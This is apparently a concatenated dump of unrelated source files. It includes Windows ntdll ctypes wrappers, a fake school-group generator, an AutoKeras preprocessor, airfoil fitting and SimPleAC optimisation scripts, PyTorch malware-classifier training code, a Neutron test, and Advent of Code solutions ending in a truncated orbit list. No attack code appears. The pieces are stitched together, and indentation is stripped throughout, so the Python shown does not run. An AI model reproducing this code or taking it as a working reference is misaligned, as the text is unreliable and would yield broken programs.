def TpCallbackSendAlpcMessageOnCompletion(TpHandle, PortHandle, Flags, SendMessage):
return TpCallbackSendAlpcMessageOnCompletion.ctypes_function(TpHandle, PortHandle, Flags, SendMessage)
# Compression
@NtdllProxy()
def RtlDecompressBuffer(CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer, CompressedBufferSize=None, FinalUncompressedSize=NeededParameter):
if CompressedBufferSize is None:
CompressedBufferSize = len(CompressedBuffer)
return RtlDecompressBuffer.ctypes_function(CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer, CompressedBufferSize, FinalUncompressedSize)
@NtdllProxy()
def RtlDecompressBufferEx(CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer, CompressedBufferSize=None, FinalUncompressedSize=NeededParameter, WorkSpace=NeededParameter):
if CompressedBufferSize is None:
CompressedBufferSize = len(CompressedBuffer)
# TODO: automatic 'WorkSpace' size calc + allocation ?
return RtlDecompressBufferEx.ctypes_function(CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer, CompressedBufferSize, FinalUncompressedSize, WorkSpace)
@NtdllProxy()
def RtlGetCompressionWorkSpaceSize(CompressionFormatAndEngine, CompressBufferWorkSpaceSize, CompressFragmentWorkSpaceSize):
return RtlGetCompressionWorkSpaceSize.ctypes_function(CompressionFormatAndEngine, CompressBufferWorkSpaceSize, CompressFragmentWorkSpaceSize)
# Section
@NtdllProxy()
def NtCreateSection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle):
return NtCreateSection.ctypes_function(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle)
@NtdllProxy()
def NtOpenSection(SectionHandle, DesiredAccess, ObjectAttributes):
return NtOpenSection.ctypes_function(SectionHandle, DesiredAccess, ObjectAttributes)
@NtdllProxy()
def NtMapViewOfSection(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect):
return NtMapViewOfSection.ctypes_function(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect)
@NtdllProxy()
def NtUnmapViewOfSection(ProcessHandle, BaseAddress):
return NtUnmapViewOfSection.ctypes_function(ProcessHandle, BaseAddress)
# Registry
@NtdllProxy()
def NtOpenKey(KeyHandle, DesiredAccess, ObjectAttributes):
return NtOpenKey.ctypes_function(KeyHandle, DesiredAccess, ObjectAttributes)
@NtdllProxy()
def NtCreateKey(pKeyHandle, DesiredAccess, ObjectAttributes, TitleIndex, Class, CreateOptions, Disposition):
return NtCreateKey.ctypes_function(pKeyHandle, DesiredAccess, ObjectAttributes, TitleIndex, Class, CreateOptions, Disposition)
@NtdllProxy()
def NtSetValueKey(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize):
return NtSetValueKey.ctypes_function(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize)
@NtdllProxy()
def NtQueryValueKey(KeyHandle, ValueName, KeyValueInformationClass, KeyValueInformation, Length, ResultLength):
return NtQueryValueKey.ctypes_function(KeyHandle, ValueName, KeyValueInformationClass, KeyValueInformation, Length, ResultLength)
@NtdllProxy()
def NtEnumerateValueKey(KeyHandle, Index, KeyValueInformationClass, KeyValueInformation, Length, ResultLength):
return NtEnumerateValueKey.ctypes_function(KeyHandle, Index, KeyValueInformationClass, KeyValueInformation, Length, ResultLength)
@NtdllProxy()
def NtQueryLicenseValue(Name, Type, Buffer, Length=None, DataLength=NeededParameter):
if Length is None and Buffer:
Length = len(Buffer)
return NtQueryLicenseValue.ctypes_function(Name, Type, Buffer, Length, DataLength)
# Other
@NtdllProxy()
def RtlEqualUnicodeString(String1, String2, CaseInSensitive):
return RtlEqualUnicodeString.ctypes_function(String1, String2, CaseInSensitive)
# Firmware
@NtdllProxy()
def NtEnumerateSystemEnvironmentValuesEx(InformationClass, Buffer, BufferLength):
return NtEnumerateSystemEnvironmentValuesEx.ctypes_function(InformationClass, Buffer, BufferLength)
#########
``` |
{
"source": "1orwell/yrs2013",
"score": 3
} |
#### File: yrs2013/groups/generate_fake_groups.py
```python
from groups import *
import random
def gen(num_students):
num_teachers = num_students/10
class_size = 20
friendship_group_size = 10
period_list = []
friendship_group_list = []
#make classes
for p in range(6):
class_list = []
#make students
s=range(num_students)
#make teachers
t=range(num_students,(num_students+num_teachers))
for c in range(0,num_students,class_size):
g = Group()
for n in range(class_size):
student = random.choice(s)
s.remove(student)
g.members.append(student)
for n in range(2):
teacher = random.choice(t)
t.remove(teacher)
g.teachers.append(teacher)
class_list.append(g)
period_list.append(class_list)
#make friends (daw)
s = range(num_students)
for f in range(0,num_students,friendship_group_size):
g = Group()
for n in range(friendship_group_size):
friend = random.choice(s)
s.remove(friend)
g.members.append(friend)
friendship_group_list.append(g)
return period_list,friendship_group_list
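# Illustrative usage (not part of the original script): build groups for 100
# students and inspect the result.
# periods, friendship_groups = gen(100)
# print(len(periods), len(periods[0]), len(friendship_groups))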
``` |
{
"source": "1over/autokeras",
"score": 3
} |
#### File: autokeras/engine/preprocessor.py
```python
from autokeras.engine import serializable
class Preprocessor(serializable.Serializable):
"""A preprocessor for tf.data.Dataset.
A preprocessor transforms the dataset using `tf.data` operations.
"""
def fit(self, dataset):
"""Fit the preprocessor with the dataset.
# Arguments
dataset: an instance of `tf.data.Dataset`.
"""
# TODO: may need to change to a streaming way of fit to reduce the
# number of iterations through the dataset for speed. Need to be
# decided when we have more use cases for this fit.
raise NotImplementedError
def transform(self, dataset):
"""Transform the dataset wth the preprocessor.
# Arguments
dataset: an instance of `tf.data.Dataset`.
# Returns
The transformed dataset.
"""
raise NotImplementedError
class TargetPreprocessor(Preprocessor):
"""Preprocessor for target data."""
def postprocess(self, dataset):
"""Postprocess the output of the Keras model.
# Arguments
dataset: numpy.ndarray. The corresponding output of the model.
# Returns
numpy.ndarray. The postprocessed data.
"""
raise NotImplementedError
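# A minimal illustrative subclass (an assumption for clarity, not part of AutoKeras):
# a preprocessor that rescales every feature batch by a constant factor.
#
# class Rescale(Preprocessor):
#     def __init__(self, factor=1.0 / 255):
#         self.factor = factor
#
#     def fit(self, dataset):
#         pass  # nothing to learn for a fixed rescaling
#
#     def transform(self, dataset):
#         return dataset.map(lambda x: x * self.factor)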
``` |
{
"source": "1ozturkbe/OCTHaGOn.jl",
"score": 3
} |
#### File: data/airfoil/airfoil_fits.py
```python
"TASOPT c series airfoil fits"
from __future__ import print_function
from builtins import zip
from builtins import range
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from gpfit.fit import fit
plt.rcParams.update({'font.size':15})
def text_to_df(filename):
"parse XFOIL polars and concatente data in DataFrame"
lines = list(open(filename))
for i, l in enumerate(lines):
lines[i] = l.split("\n")[0]
for j in 10-np.arange(9):
if " "*j in lines[i]:
lines[i] = lines[i].replace(" "*j, " ")
if "---" in lines[i]:
start = i
data = {}
titles = lines[start-1].split(" ")[1:]
for t in titles:
data[t] = []
for l in lines[start+1:]:
for i, v in enumerate(l.split(" ")[1:]):
data[titles[i]].append(v)
df = pd.DataFrame(data)
df = df.astype(float)
return df
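# Note (added for clarity): text_to_df assumes an XFOIL polar text file in which a
# row of dashes ("---") underlines the column titles; the line just above the dashes
# supplies the column names and every line below it is a whitespace-separated data row.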
def fit_setup(thick_range, re_range, M_range):
"set up x and y parameters for gp fitting"
cd = []
tau = []
mach = []
re = []
cl = []
for m in M_range:
for n in thick_range:
for r in re_range:
dataf = text_to_df("blade_data/blade.c%s.Re%dk.M%s.pol" % (n, r, m))
for i in range(len(dataf["CD"])):
if dataf["CD"][i] and dataf["CL"][i] != 0:
cd.append(dataf["CD"][i])
cl.append(dataf["CL"][i])
re.append(r)
tau.append(float(n)/1000)
mach.append(m)
u1 = np.hstack(re)
print(u1)
u2 = np.hstack(tau)
print(u2)
u3 = np.hstack(mach)
u4 = np.hstack(cl)
w = np.hstack(cd)
u1 = u1.astype(float)
u2 = u2.astype(float)
u3 = u3.astype(float)
w = w.astype(float)
u = [u1, u2, u3, u4]
x = np.log(u)
y = np.log(w)
return x, y
def make_fit(thick_range, re_range, M_range):
#call the fit setup function
x, y = fit_setup(thick_range, re_range, M_range)
cstrt, rms = fit(x, y, 4, 'SMA')
print("RMS")
print(rms)
return cstrt, rms
if __name__ == "__main__":
Re = list(range(10000, 35000, 5000))
thick = ["100", "110", "120", "130", "140", "145"]
M = [0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
cl = np.linspace(0.35, 0.70, 8)
X, Y = fit_setup(thick, Re, M)
X = np.transpose(X)
np.savetxt('airfoil_X.csv', X, delimiter=',')
np.savetxt('airfoil_Y.csv', Y, delimiter=',')
cstrt, rms = make_fit(thick, Re, M)
```
#### File: python/test/test_constraintify.py
```python
import numpy as np
from gpkit import Variable, Model
from gpkit.small_scripts import mag
from gpfit.fit import fit
import unittest
from gpkitmodels.SP.SimPleAC.SimPleAC_mission import *
from interpretableai import iai
import pickle
from OCTHaGOn.constraint_tree import ConstraintTree
from OCTHaGOn.global_model import GlobalModel
from OCTHaGOn.sample import gen_X
from OCTHaGOn.tools import (find_signomials, prep_SimPleAC,
get_varkeys, get_bounds, \
bound_variables, \
constraint_from_gpfit, HiddenPrints)
from OCTHaGOn.testing.run_tests import run_tests
class TestConstraintify(unittest.TestCase):
def test_monomials_from_pwl_data(self):
pwlDict = {1: [1, [2,3,4]],
2: [5, [6,7,8]],
3: [9, [10,11,12]]}
a = Variable('a')
b = Variable('b')
c = Variable('c')
ivars = [a, b*c**0.35, c]
dvar = a*b
constraintDict = ConstraintTree.pwl_constraintify(pwlDict, dvar, ivars)
test_constr = np.exp(1)*ivars[0]**2*ivars[1]**3*ivars[2]**4 <= dvar
self.assertEqual(test_constr.as_hmapslt1({}),
constraintDict[1][0].as_hmapslt1({}))
def test_ConstraintTree_sp_constraints(self):
"""
Tests ConstraintTree generation from SP constraints
"""
m, basis = prep_SimPleAC()
# Identify signomial constraints
sp_constraints = find_signomials(m)
sp_variables = get_varkeys(sp_constraints)
#TODO: complete
def test_SimPleAC_with_treeconstraints(self):
m, basis = prep_SimPleAC()
basesol = m.localsolve(verbosity=0)
# Now replacing the drag model with a learner...
constraints = [c for c in m.flat()]
del constraints[-12:-8]
lnr = iai.read_json("data/solar_airfoil_lnr.json")
subs = m.substitutions.copy()
for i in range(len(m['C_{D_{wpar}}'])):
basis = {m['Re'][i].key: 1.5e6,
m['\\tau'].key: 0.12}
dvar = m['C_{D_{wpar}}'][i]
ivars = [m['Re'][i],
m['\\tau'],
m['C_L'][i]]
bounds = {
m['Re'][i].key: [5e5,3e6],
m['\\tau'].key: [0.08, 0.23],
m['C_L'][i].key: [0.33, 2.0],
}
ct = ConstraintTree(lnr, dvar, ivars, basis=basis, bounds=bounds)
constraints.append(ct)
gm = GlobalModel(m.cost, constraints, subs)
sol = gm.solve(verbosity=2)
def test_SimPleAC_with_surrogate_tree(self):
m, basis = prep_SimPleAC()
# Replicate GP model with new models
basesol = m.localsolve(verbosity=0)
ivars = [m[var] for var in list(basis.keys())]
dvar = Variable("Total cost", "N", "fuel and time cost")
# Fitting GPfit model
solns = pickle.load(open("data/SimPleAC.sol", "rb"))
subs = pickle.load(open("data/SimPleAC.subs", "rb"))
X = gen_X(subs, basis)
Y = [mag(soln['cost'] / basesol['cost']) for soln in solns]
with HiddenPrints():
cstrt, rms = fit(np.log(np.transpose(X)), np.log(Y), 4, 'SMA')
basis[dvar.key] = basesol['cost']*dvar.units
fit_constraint = constraint_from_gpfit(cstrt, dvar, ivars, basis)
basis.pop(dvar.key)
m = Model(dvar, [fit_constraint], basis)
fitsol = m.solve(verbosity=0, reltol=1e-6)
self.assertAlmostEqual(fitsol['cost']/basesol['cost'], 1, places=2)
# Now with trees
lnr = iai.read_json("data/SimPleAC_lnr.json")
bounds = pickle.load(open("data/SimPleAC.bounds", "rb"))
basis[dvar.key] = basesol['cost']*dvar.units
# Check that bounding constraints are same for the two generation methods
c1 = bound_variables(bounds, m)
c2 = bound_variables(bounds, ivars)
for i in range(len(c1)):
self.assertEqual(c1[i].as_hmapslt1({}), c2[i].as_hmapslt1({}))
ct1 = ConstraintTree(lnr, dvar, ivars, basis=basis, bounds=bounds)
ct2 = ConstraintTree(lnr, dvar, ivars, basis=basis)
# Making sure solutions are identical as well
del basis[dvar.key]
gm1 = GlobalModel(dvar, [ct1], basis)
sol1 = gm1.solve(verbosity=0)
gm2 = GlobalModel(dvar, [ct2, c2], basis)
sol2 = gm2.solve(verbosity=0)
self.assertAlmostEqual(sol1['cost']/basesol['cost'], 1, places=2)
self.assertAlmostEqual(sol1['cost'], sol2['cost'], places=2)
TESTS = [TestConstraintify]
if __name__ == "__main__":
run_tests(TESTS)
```
#### File: OCTHaGOn.jl/python/train.py
```python
import numpy as np
from interpretableai import iai
def train_trees(X, Y, **kwargs):
"""
Wrapper for IAI grid search with optional kwargs.
:param X: feature data
:param Y: class data
:param kwargs: kwargs for learner
:return: A solved gridsearch over the data, where
grid.get_learner() gives the best performing tree.
"""
lnr_kwargs = {'regression_sparsity': 'all',
'fast_num_support_restarts': 3,
'hyperplane_config': [{'sparsity': 1}],
'random_seed': 314}
split_data_kwargs = {'seed': 314,
'train_proportion': 0.5}
grid_kwargs = {'max_depth': [2, 3],
'regression_lambda': [0.001],
'minbucket': [0.05, 0.01]
}
for key, value in kwargs.items():
# Setting learner parameters
if key in ['regression_sparsity', 'hyperplane_config', 'fast_num_support_restarts']:
lnr_kwargs.update({key: value})
elif key in ['regression_lambda', 'max_depth', 'minbucket', 'cp']:
grid_kwargs.update({key:value})
elif key == 'seed':
lnr_kwargs.update({'random_seed': value})
split_data_kwargs.update({key: value})
elif key == 'train_proportion':
split_data_kwargs.update({key: value})
else:
raise ValueError("Kwarg with key %s is invalid." % key)
lnr = iai.OptimalTreeRegressor()
lnr.set_params(**lnr_kwargs)
(train_X, train_Y), (test_X, test_Y) = iai.split_data('regression', X, Y,
**split_data_kwargs)
grid = iai.GridSearch(lnr, **grid_kwargs)
grid.fit(train_X, train_Y, test_X, test_Y)
return grid
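# Illustrative call (assumed data shapes, not from the original repo):
# grid = train_trees(X, Y, max_depth=[2, 3], seed=314)
# best_lnr = grid.get_learner()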
``` |
{
"source": "1ozturkbe/robustSPpaper",
"score": 3
} |
#### File: robustSPpaper/code/SimPleAC_objectivetable.py
```python
import csv
import numpy as np
from gpkit import Model, units
from SimPleAC_setup import SimPleAC_setup
from SimPleAC_radar import generate_radar_data, gen_SimPleAC_radar
from SimPleAC_draw import SimPleAC_draw
def objective_table_csv(objectives, data, keyOrder, baseresult):
rawdata = [None] * (len(objectives) + 1)
rawdata[0] = ['Objective'] + [objectives[i]['name'] for i in keyOrder]
count = 0
for i in range(len(keyOrder)):
count += 1
rawdata[count] = [objectives[keyOrder[i]]['name']] + list(np.around(np.divide(np.array(data[count][1][0]),np.array(baseresult)),decimals=2))
with open("savefigs/objective_table.csv",'w') as resultFile:
wr = csv.writer(resultFile, dialect='excel')
for i in range(len(rawdata)):
wr.writerow(rawdata[i])
if __name__ == "__main__":
m, subs = SimPleAC_setup()
# Putting in objectives and associated substitutions
# in a dictionary
objectives = {m['W_{f_m}'] : {'name': 'Total fuel', 'added': {}, 'removed': {}},
m['W_{f_m}']+m['C_m']*m['t_m']*units('N') : {'name': 'Total cost', 'added': {}, 'removed': {}},
m['W'] : {'name': 'Takeoff weight', 'added': {}, 'removed': {}},
1/(m['L'][2]/m['D'][2]) : {'name': '1/(Cruise L/D)', 'added': {}, 'removed': {}},
m['W_e'] : {'name': 'Engine weight', 'added': {}, 'removed': {}},
m['S'] : {'name': 'Wing area', 'added': {}, 'removed': {}},
}
keyOrder = [m['W_{f_m}'], m['W_{f_m}']+m['C_m']*m['t_m']*units('N'), m['W'],
1/(m['L'][2]/m['D'][2]), m['W_e'], m['S']]
models = {}
methods = ['nominal']
baseobj = m['W_{f_m}']
# Adding minimizer so all objectives are tight at the optimum
minimizer = 10**-6 * sum(i/i.units if i.units else i for i in objectives.keys())
# Nominal case must always be first!
marray = [[] for i in range(len(keyOrder))]
for i in range(len(keyOrder)):
try:
nm = Model(keyOrder[i] + minimizer*keyOrder[i].units, m, m.substitutions)
except:
nm = Model(keyOrder[i] + minimizer, m, m.substitutions)
marray[i].append(nm)
# Solving marray
solutions = gen_SimPleAC_radar(marray, methods, objectives, keyOrder, baseobj)
# Tabulating data
[data, maxesindata, minsindata] = generate_radar_data(solutions, objectives, keyOrder, baseobj)
# Storing in csv
baseresult = data[1][1][0] # result for fuel burn for comparison
objective_table_csv(objectives, data, keyOrder, baseresult)
# Drawing solutions
count = 0
for sol in solutions:
SimPleAC_draw(sol[0], color='blue', directory = 'objectiveTableResults', name='objtable'+str(count))
count += 1
``` |
{
"source": "1p4pk/SusML",
"score": 3
} |
#### File: malware_prediction/eval/dataset_test.py
```python
import pandas as pd
import torch
from torch.utils import data
class MalwareTestDataset(data.Dataset):
def __init__(self, tensor_path, csv_path):
self.X = torch.load(tensor_path)
self.id = pd.read_csv(csv_path)['MachineIdentifier'].values
self.rows = self.X.shape[0]
def __len__(self):
return len(self.X)
def __getitem__(self, index):
return self.X[index], self.id[index]
```
#### File: malware_prediction/train/dataset_train.py
```python
import torch
from torch.utils import data
class MalwareTrainDataset(data.Dataset):
def __init__(self, train_data_path, label_data_path):
self.X = torch.load(train_data_path)
self.y = torch.load(label_data_path)
self.rows = self.X.shape[0]
self.cols = self.X.shape[1]
def __len__(self):
return len(self.X)
def __getitem__(self, index):
return self.X[index], self.y[index]
```
#### File: malware_prediction/train/main_model.py
```python
import os
import socket
import sys
from torch import distributed as dist
from torch import nn
from torch import optim
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.dataloader import DataLoader
from .dataset_train import MalwareTrainDataset
from .model import MalwarePredictor
from .train import ModelTrainer
from ..benchmark import timeit, memory_monitor, cpu_monitor, disk_monitor
SIZE = int(os.environ['OMPI_COMM_WORLD_SIZE'])
RANK = int(os.environ['OMPI_COMM_WORLD_RANK'])
HOSTNAME = socket.gethostname()
# LABEL_DATA_PATH = f'./data/tensor/label_data_{RANK}.pt'
# TRAIN_DATA_PATH = f'./data/tensor/train_data_{RANK}.pt'
LABEL_DATA_PATH = f'./data/tensor/label_data.pt'
TRAIN_DATA_PATH = f'./data/tensor/train_data.pt'
OPTIMIZER = sys.argv[2]
LOSS_FUNCTION = sys.argv[3]
MODEL_PATH = f"./models/model_{OPTIMIZER}_{LOSS_FUNCTION}.pb"
@cpu_monitor(file_name="model")
@memory_monitor(file_name="model")
@disk_monitor(file_name="model")
@timeit(file_name="model")
def run(backend='mpi'):
""" Initialize the distributed environment. """
print(f"Running rank {RANK} of {SIZE} on {HOSTNAME}")
print("Load Data")
dist.init_process_group(backend)
dataset = MalwareTrainDataset(TRAIN_DATA_PATH, LABEL_DATA_PATH)
loader = DataLoader(dataset, batch_size=100)
model = DDP(MalwarePredictor(loader.dataset.cols, 100, 100, 1))
loss = get_loss(LOSS_FUNCTION)
optimizer = get_optimizer(OPTIMIZER, model.parameters())
print("Model prepared.")
print("Process group initialized.")
trainer = ModelTrainer(loader, model, loss, optimizer, MODEL_PATH)
print("Trainer initialized.")
trainer.train(15, verbose=True)
print("Done training.")
dist.destroy_process_group()
def get_optimizer(optimizer: str, parameters):
optimizer = optimizer.lower()
if optimizer == "sgd":
return optim.SGD(parameters, lr=0.01)
elif optimizer == "adagrad":
return optim.Adagrad(parameters, lr=0.01)
elif optimizer == "adam":
return optim.Adam(parameters, lr=0.001)
elif optimizer == "adamw":
return optim.AdamW(parameters, lr=0.001)
elif optimizer == "asgd":
return optim.ASGD(parameters, lr=0.01)
def get_loss(loss: str):
loss = loss.lower()
if loss == "mseloss":
return nn.MSELoss()
elif loss == "bceloss":
return nn.BCELoss()
if __name__ == '__main__':
run()
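# Launch note (assumed, based on the OMPI_COMM_WORLD_* variables and the 'mpi'
# backend above): the script is meant to be started under Open MPI via mpirun,
# with sys.argv[2] selecting the optimizer and sys.argv[3] the loss function.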
``` |
{
"source": "1pikachu/examples",
"score": 2
} |
#### File: examples/imagenet/optimizer_util.py
```python
import torch
def to_dense(optim):
for param in optim.state.values():
# Not sure there are any global tensors in the state dict
if isinstance(param, torch.Tensor) and param.layout is torch._mkldnn:
param.data = param.data.to_dense()
if param._grad is not None:
param._grad.data = param._grad.data.to_dense()
elif isinstance(param, dict):
for subparam in param.values():
if isinstance(subparam, torch.Tensor) and subparam.layout is torch._mkldnn:
subparam.data = subparam.data.to_dense()
if subparam._grad is not None:
subparam._grad.data = subparam._grad.data.to_dense()
def to_mkldnn(optim):
for param in optim.state.values():
if isinstance(param, torch.Tensor) and param.dtype == torch.float32:
param.data = param.data.to_mkldnn()
if param._grad is not None:
param._grad.data = param._grad.data.to_mkldnn()
elif isinstance(param, dict):
for subparam in param.values():
if isinstance(subparam, torch.Tensor) and subparam.dtype == torch.float32:
subparam.data = subparam.data.to_mkldnn()
if subparam._grad is not None:
subparam._grad.data = subparam._grad.data.to_mkldnn()
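# Illustrative workflow (assumed, not part of the original file): keep the optimizer
# state in MKL-DNN layout while training on CPU, then convert back before saving.
#
# optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
# to_mkldnn(optimizer)   # after model.to_mkldnn()
# ...training loop...
# to_dense(optimizer)    # before torch.save(optimizer.state_dict(), path)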
``` |
{
"source": "1pintbeer/neutron",
"score": 2
} |
#### File: plugins/ml2/test_ext_portsecurity.py
```python
from neutron_lib.api.definitions import port_security as psec
from neutron_lib import context
from neutron_lib.plugins import directory
from oslo_config import cfg
from neutron.tests.unit.extensions import test_portsecurity as test_psec
from neutron.tests.unit.plugins.ml2 import test_plugin
class PSExtDriverTestCase(test_plugin.Ml2PluginV2TestCase,
test_psec.TestPortSecurity):
_extension_drivers = ['port_security']
def setUp(self):
cfg.CONF.set_override('extension_drivers',
self._extension_drivers,
group='ml2')
super(PSExtDriverTestCase, self).setUp()
def test_create_net_port_security_default(self):
_core_plugin = directory.get_plugin()
admin_ctx = context.get_admin_context()
args = {'network':
{'name': 'test',
'tenant_id': '',
'shared': False,
'admin_state_up': True,
'status': 'ACTIVE'}}
network = None
try:
network = _core_plugin.create_network(admin_ctx, args)
_value = network[psec.PORTSECURITY]
finally:
if network:
_core_plugin.delete_network(admin_ctx, network['id'])
self.assertEqual(psec.DEFAULT_PORT_SECURITY, _value)
def test_create_port_with_secgroup_none_and_port_security_false(self):
if self._skip_security_group:
self.skipTest("Plugin does not support security groups")
with self.network() as net:
with self.subnet(network=net):
res = self._create_port('json', net['network']['id'],
arg_list=('security_groups',
'port_security_enabled'),
security_groups=[],
port_security_enabled=False)
self.assertEqual(201, res.status_int)
port = self.deserialize('json', res)
self.assertFalse(port['port'][psec.PORTSECURITY])
self.assertEqual([], port['port']['security_groups'])
``` |
{
"source": "1pkg/dump",
"score": 3
} |
#### File: aoc/src/4.py
```python
def check(passw):
prev = ''
adjacent = False
asc = True
for char in passw:
if prev == '':
prev = char
continue
if char == prev:
adjacent = True
if int(char) < int(prev):
asc = False
prev = char
return adjacent and asc
summ = 0
for i in range(382345, 843167):
if check(str(i)):
summ +=1
print(summ)
```
#### File: aoc/src/6.1.py
```python
def parse_orbs(inc):
db = {}
for pair in inc:
(parent, current) = pair.split(')')
db[current] = parent
return db
def traverse_between(inc, node1, node2):
summs = []
db = parse_orbs(inc)
node1len = 0
curren1 = node1
while True:
if curren1 not in db:
break
curren1 = db[curren1]
node1len += 1
node2len = 0
curren2 = node2
while True:
if curren2 not in db:
break
curren2 = db[curren2]
node2len += 1
if curren2 == curren1:
print(curren1, node1len + node2len)
summs.append(node1len + node2len - 2)
break
summs.sort()
return summs
print(traverse_between([
'KWT)W4F',
'TKX)NX9',
'4K2)BRZ',
'6FT)G8R',
'F83)5PC',
'DRJ)8DZ',
'89K)VFY',
'2BT)1M5',
'19Z)DRJ',
'YVX)S7H',
'7L1)PVG',
'NSS)GJ8',
'XTK)85X',
'63D)V7T',
'RTP)D27',
'1JM)VV1',
'9KT)3F7',
'K9C)X1S',
'VS3)FSR',
'9N5)5LX',
'C4F)KP1',
'WNX)YG3',
'FXY)2ND',
'VGF)Y7M',
'BTD)4VJ',
'JSC)H7Q',
'VL5)1RW',
'8PL)FMY',
'D27)KYC',
'M71)CB3',
'93X)Y2S',
'KVH)65Z',
'PQJ)D6D',
'RVD)FVL',
'SF3)3L5',
'G6V)HYT',
'2SY)PS2',
'D9S)TKX',
'G1W)K7C',
'GD5)KL6',
'F1V)HLT',
'Z2D)DTP',
'TXT)2TZ',
'DGM)4L7',
'91Z)4R4',
'165)LSN',
'LZN)MW4',
'Y5C)3YZ',
'6YW)BL6',
'P31)NV9',
'JB2)5LJ',
'DFJ)5LV',
'STY)GP6',
'9H4)7ND',
'16L)8VF',
'4BF)YRT',
'DWS)GWQ',
'ZDY)X5S',
'P5X)FH1',
'WQ6)KNC',
'PLQ)P7H',
'PVG)4HL',
'21F)TR7',
'GKD)HZR',
'TR9)DDC',
'C46)23G',
'24H)WDX',
'XP7)Y3L',
'WSK)P2M',
'YM4)7DN',
'R9L)J3H',
'2LB)G5L',
'SPM)NVJ',
'KFM)TXT',
'C9H)HPL',
'WGN)9VZ',
'WFZ)7JR',
'SNF)BJG',
'WTF)3KX',
'HG9)HHG',
'Q2R)535',
'513)49V',
'9X6)X8G',
'ZDM)C67',
'ZKL)H8W',
'CXH)DKQ',
'DDF)XT5',
'XPG)CC8',
'119)7RG',
'8J2)D8Q',
'Y3S)BSP',
'Q9W)PKR',
'BVJ)BP2',
'G9S)SPM',
'7KP)RVW',
'RRT)ZZH',
'T14)1YX',
'N1S)22L',
'YVT)TLC',
'DWS)W5Q',
'CWG)M3P',
'HX2)GBG',
'HWP)JCH',
'Y83)7GW',
'5V5)RQV',
'NWQ)1XC',
'KW2)K27',
'9B5)WT4',
'MT6)2LD',
'J96)BSF',
'FMH)8JC',
'TL6)2HP',
'G8D)K7T',
'QBX)ZNV',
'STY)VQ8',
'3YJ)TRP',
'KFM)67Q',
'PKR)8KL',
'9XQ)YXW',
'X4K)59D',
'Z4W)FGS',
'MT7)NG6',
'X3H)2FW',
'4VJ)Q5M',
'4QG)846',
'QJC)Y1L',
'46N)Y3S',
'KKQ)84B',
'V18)47B',
'2QL)VKN',
'662)JV4',
'FP7)1XP',
'KFX)GZV',
'1D3)XDX',
'DTP)V8R',
'P96)FTY',
'CZ7)FXL',
'CST)9HD',
'WY6)NQ3',
'8VN)5C2',
'XGG)T9C',
'L83)RZ7',
'ZP7)CP5',
'C6V)S56',
'MNK)R53',
'5BH)ZJ6',
'BLT)683',
'H2H)2JS',
'QNF)8W1',
'3QD)84Y',
'NG6)238',
'QKY)HHD',
'5MY)1MR',
'419)HGT',
'7TY)VYV',
'TC5)2KB',
'VGH)65G',
'4VL)VHX',
'6XH)PMQ',
'BWP)6K3',
'HB9)G88',
'MCF)YPC',
'PBN)TK7',
'BMS)4X2',
'6K2)PLK',
'3ST)RBF',
'5VP)F16',
'7GW)LWH',
'9Q8)MLW',
'JH8)S4Z',
'CQ4)TC2',
'2KG)55W',
'DV1)F6D',
'WP1)123',
'SGL)WL1',
'N5P)6JJ',
'1M5)YK2',
'NPN)QRN',
'B1Z)PRH',
'WLP)SGC',
'7BC)H5W',
'S4T)19Q',
'RBH)XQZ',
'79H)NT9',
'BP2)2VW',
'FQD)6Y7',
'65G)LT4',
'Q3G)1JY',
'Q68)5QQ',
'LGW)QVZ',
'W2K)C4Z',
'F87)S97',
'SFQ)XPG',
'6W3)NFG',
'ZK8)2R2',
'HZR)N4B',
'ZNV)GFB',
'QKG)XQ7',
'XQT)F8X',
'BX2)P4D',
'5LX)D1B',
'LXT)M8W',
'85X)S82',
'X2G)TMB',
'2LX)MVG',
'9X3)ZDH',
'NM3)Q2R',
'XVS)GBV',
'BWP)Z66',
'YKR)NWR',
'1JY)44H',
'919)JKS',
'FWK)YVX',
'YTM)MQB',
'SX9)B94',
'R3W)QBX',
'9PN)XPX',
'FTY)MVK',
'2KQ)CNW',
'Z5J)W31',
'GBV)QFT',
'QZB)62Y',
'BT3)4BK',
'3F7)QKQ',
'9HD)7MJ',
'NPP)92Q',
'JWV)RMV',
'XZT)SBD',
'1XF)PNB',
'LB5)ZSX',
'2YQ)TBQ',
'KPQ)M65',
'DRJ)5ZS',
'3QL)3RG',
'LZL)N9C',
'PJM)89K',
'F5R)NFF',
'PNB)2BT',
'MZX)NBF',
'DBW)WL4',
'WYK)NRK',
'C4Z)SD7',
'7M8)1HF',
'VCK)MFG',
'9W9)BXJ',
'P2B)7T7',
'5JL)FRT',
'QKQ)GVS',
'Q6S)D9S',
'6SC)VG2',
'4FH)TW4',
'JBL)ZG1',
'QP8)DTX',
'M65)DV1',
'H54)LQ3',
'L1C)64K',
'MVK)HB9',
'TJD)ZP3',
'QL7)5RG',
'QWK)YTT',
'LQY)CHG',
'5BG)12J',
'1HF)Q99',
'ZJ6)Q5V',
'1MR)6TP',
'SVJ)T4Y',
'PRD)BXP',
'1F9)GFJ',
'X1S)9H6',
'RC1)CMZ',
'Y1S)KLK',
'WPB)G95',
'XLL)BQB',
'HGV)PQG',
'VLJ)7L1',
'MQB)3ND',
'4SM)6MX',
'F53)919',
'WV6)XC4',
'4H5)RZB',
'3Y7)YX6',
'PTX)D1M',
'PGY)YPM',
'C7P)G1W',
'HWW)S1T',
'4VJ)N9Z',
'51X)Y83',
'LS4)WDS',
'54Y)R8L',
'2W8)M95',
'G4B)814',
'277)41P',
'MJL)58Q',
'6K3)SGK',
'Z5T)QLH',
'HZL)W5S',
